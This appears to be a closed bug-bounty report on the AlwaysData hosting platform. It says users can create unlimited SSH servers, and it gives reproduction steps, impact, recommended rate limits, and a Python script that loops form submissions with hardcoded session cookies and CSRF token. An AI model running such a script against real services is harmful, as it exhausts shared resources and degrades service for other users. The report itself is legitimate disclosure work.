|
73 | Closed | Unlimited SSH Server Creation Vulnerability on AlwaysDa ... | admsec |
Task Description
# Unlimited SSH Server Creation Vulnerability on AlwaysData
## Summary
There is no limit on the number of SSH servers that can be created by a user on the AlwaysData platform. This vulnerability allows for unauthorized resource exhaustion, which could lead to service degradation or denial of service (DoS).
## Steps to Reproduce
1. Log in to your AlwaysData account.
2. Navigate to the SSH server creation page: `https://admin.alwaysdata.com/ssh/add/`.
3. Submit the form to create a new SSH server using a valid name and password.
4. Repeat the above step multiple times with different names like `jhoneone_1002`, `jhoneone_1003`, etc.
5. Observe that there is no limit imposed on the number of SSH servers that can be created, leading to potential resource exhaustion.
## Impact
- Resource Exhaustion: An attacker can create an unlimited number of SSH servers, potentially exhausting the resources allocated to other users on the platform.
- Denial of Service: Continuous server creation could degrade the platform's performance or lead to a denial of service.
## Recommendations
- Implement Limits: Set a reasonable limit on the number of SSH servers that can be created per user.
- Monitor for abnormal SSH server creation patterns and implement rate limiting to prevent abuse.
## Python Script to Exploit the Vulnerability
```python
import requests
# Configuration
url = "https://admin.alwaysdata.com/ssh/add/"
headers = {
"Host": "admin.alwaysdata.com",
"Cookie": "csrftoken=dnNRG2ExW88JR4GFKyeRRbD0JMV6E7IH; django_language=en; sessionid=q25k858xtrmg95b2t486xg7snokn99ls",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://admin.alwaysdata.com/ssh/add/",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "https://admin.alwaysdata.com",
"Dnt": "1",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers"
}
# Function to create an SSH server
def create_ssh_server(session, csrf_token, username, password="AAAaaa123###"):
data = {
"csrfmiddlewaretoken": csrf_token,
"name": username,
"password": password,
"home_directory": "",
"shell": "BASH",
"can_use_password": "on",
"annotation": "",
"submit": ""
}
response = session.post(url, headers=headers, data=data)
return response.status_code, response.text
# Main script
if name == "main":
with requests.Session() as session:
# Replace the csrf_token below with your own token from your account
csrf_token = "hpjP7TYZxZLeNcxhqG3fC6vZkwecJIc4kCWwDLsmjXJNu63M047Wj7YPT8Z8dFKB"
for i in range(1002, 1100): # Create multiple servers
username = f"jhoneone_{i}"
status_code, response_text = create_ssh_server(session, csrf_token, username)
print(f"Status Code: {status_code}, Username: {username}")
# Optionally, you can log the response_text for debugging purposes
|
